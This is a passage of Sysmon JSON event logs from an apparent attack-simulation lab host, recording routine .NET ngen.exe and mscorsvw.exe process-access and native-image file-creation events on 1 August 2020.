C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.496","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-00100CFA1000}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7602,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.496\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-00100CFA1000}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.496","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-00100CFA1000}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7603,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.496\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-00100CFA1000}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.496","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-00100CFA1000}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7604,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.528\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-0010EAFC1000}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.528","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-0010EAFC1000}","TargetProcessId":"644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7605,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.528\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-0010EAFC1000}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.528","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-0010EAFC1000}","TargetProcessId":"644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7606,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.543\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-0010EAFC1000}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.543","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-0010EAFC1000}","TargetProcessId":"644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7607,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:44.700\r\nProcessGuid: {A837DB8D-04D0-5F25-0000-0010EAFC1000}\r\nProcessId: 644\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\284-0\\System.Reflection.Context.dll\r\nCreationUtcTime: 2020-08-01 05:59:44.700","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:44.700","ProcessGuid":"{A837DB8D-04D0-5F25-0000-0010EAFC1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\284-0\\System.Reflection.Context.dll","CreationUtcTime":"2020-08-01 05:59:44.700","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7608,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.731\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-001061001100}\r\nTargetProcessId: 2836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.731","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-001061001100}","TargetProcessId":"2836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7609,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.731\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-001061001100}\r\nTargetProcessId: 2836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.731","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-001061001100}","TargetProcessId":"2836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
